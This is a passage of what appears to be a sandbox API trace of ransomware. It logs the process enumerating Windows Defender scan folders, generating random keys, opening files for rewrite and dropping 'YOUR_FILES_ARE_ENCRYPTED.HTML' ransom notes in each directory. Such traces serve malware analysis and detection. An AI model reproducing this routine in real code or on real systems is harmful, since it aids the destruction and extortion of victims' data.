(pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B") returned=".5B" [0107.762] lstrlenW (lpString=".5B") returned 3 [0107.762] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.5B") returned=".5B" [0107.762] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf89c9d40, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf89c9d40, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf8ceae5e, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6a1ab6c, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67", cAlternateFileName="MPCACH~1.67")) returned 1 [0107.762] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.762] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67") returned 107 [0107.762] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67") returned=".67" [0107.762] lstrlenW (lpString=".67") returned 3 [0107.762] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.67") returned=".67" [0107.762] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x820, ftCreationTime.dwLowDateTime=0xf8d374fb, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf8d374fb, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf8d83941, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x3b14000, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79", cAlternateFileName="MPCACH~1.79")) returned 1 [0107.763] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.763] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79") returned 107 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79") returned=".79" [0107.763] lstrlenW (lpString=".79") returned 3 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.79") returned=".79" [0107.763] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x820, ftCreationTime.dwLowDateTime=0xf8da9a4e, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf8da9a4e, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf8da9a4e, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x529000, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C", cAlternateFileName="MPCACH~1.7C")) returned 1 [0107.763] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.763] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C") returned 107 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C") returned=".7C" [0107.763] lstrlenW (lpString=".7C") returned 3 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7C") returned=".7C" [0107.763] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8e8ea4a, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf8e8ea4a, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf8e8ea4a, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x3cff18, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E", cAlternateFileName="MPCACH~1.7E")) returned 1 [0107.763] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.763] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E") returned 107 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E") returned=".7E" [0107.763] lstrlenW (lpString=".7E") returned 3 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.7E") returned=".7E" [0107.763] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8fe5e00, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf8fe5e00, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf900c0a9, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0xcfdc43, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80", cAlternateFileName="MPCACH~1.80")) returned 1 [0107.763] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.763] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80") returned 107 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80") returned=".80" [0107.763] lstrlenW (lpString=".80") returned 3 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.80") returned=".80" [0107.763] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x820, ftCreationTime.dwLowDateTime=0xf907e70d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf907e70d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf907e70d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x1d7f38, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83", cAlternateFileName="MPCACH~1.83")) returned 1 [0107.763] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.763] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83") returned 107 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83") returned=".83" [0107.763] lstrlenW (lpString=".83") returned 3 [0107.763] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.83") returned=".83" [0107.764] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf900c0a9, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf900c0a9, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf900c0a9, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x1a3a61, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87", cAlternateFileName="MPCACH~1.87")) returned 1 [0107.764] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.764] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87") returned 107 [0107.764] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87") returned=".87" [0107.764] lstrlenW (lpString=".87") returned 3 [0107.764] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.87") returned=".87" [0107.764] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf90582ee, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf90582ee, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf907e70d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x358f2f, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0", cAlternateFileName="MPCACH~1.A0")) returned 1 [0107.764] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.764] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0") returned 107 [0107.764] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0") returned=".A0" [0107.764] lstrlenW (lpString=".A0") returned 3 [0107.764] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.A0") returned=".A0" [0107.764] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf907e70d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf907e70d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf907e70d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x5fff9, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB", cAlternateFileName="MPCACH~1.CB")) returned 1 [0107.764] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.764] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB") returned 107 [0107.764] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB") returned=".CB" [0107.764] lstrlenW (lpString=".CB") returned 3 [0107.764] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CB") returned=".CB" [0107.764] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf907e70d, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf907e70d, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf907e70d, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x441a1, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC", cAlternateFileName="MPCACH~1.CC")) returned 1 [0107.764] StrStrIW (lpFirst="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.764] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC") returned 107 [0107.764] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC") returned=".CC" [0107.764] lstrlenW (lpString=".CC") returned 3 [0107.764] PathFindExtensionW (pszPath="mpcache-9899DBE4D8BB3D253EB4F285757BEBAF1581B50F.bin.CC") returned=".CC" [0107.764] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd06b4edd, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd06b4edd, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x63bd6e5a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x70, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="MpDiag.bin", cAlternateFileName="")) returned 1 [0107.764] StrStrIW (lpFirst="MpDiag.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.764] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MpDiag.bin") returned 62 [0107.764] PathFindExtensionW (pszPath="MpDiag.bin") returned=".bin" [0107.764] lstrlenW (lpString=".bin") returned 4 [0107.765] PathFindExtensionW (pszPath="MpDiag.bin") returned=".bin" [0107.765] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\MpDiag.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\mpdiag.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.765] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=112) returned 1 [0107.765] CloseHandle (hObject=0x32c) returned 1 [0107.765] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="RtSigs", cAlternateFileName="")) returned 1 [0107.765] StrStrIW (lpFirst="RtSigs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.765] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs") returned 58 [0107.765] GetProcessHeap () returned 0x600000 [0107.765] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0107.767] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs" [0107.767] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\*" [0107.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626638 [0107.767] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0107.767] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Data", cAlternateFileName="")) returned 1 [0107.767] StrStrIW (lpFirst="Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.767] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data") returned 63 [0107.767] GetProcessHeap () returned 0x600000 [0107.767] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.768] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data" [0107.768] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\*" [0107.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.769] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.769] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0107.769] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.769] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0107.769] GetProcessHeap () returned 0x600000 [0107.769] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\rtsigs\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0107.770] WriteFile (in: hFile=0x310, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.771] CloseHandle (hObject=0x310) returned 1 [0107.772] GetProcessHeap () returned 0x600000 [0107.772] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.772] GetProcessHeap () returned 0x600000 [0107.772] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.773] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Data", cAlternateFileName="")) returned 0 [0107.773] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0107.773] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0107.773] GetProcessHeap () returned 0x600000 [0107.774] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.774] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\RtSigs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\rtsigs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.774] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.775] CloseHandle (hObject=0x32c) returned 1 [0107.776] GetProcessHeap () returned 0x600000 [0107.776] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.776] GetProcessHeap () returned 0x600000 [0107.776] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0107.777] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName="RtSigs", cAlternateFileName="")) returned 0 [0107.777] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.777] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0107.777] GetProcessHeap () returned 0x600000 [0107.777] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3173dd8 [0107.778] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 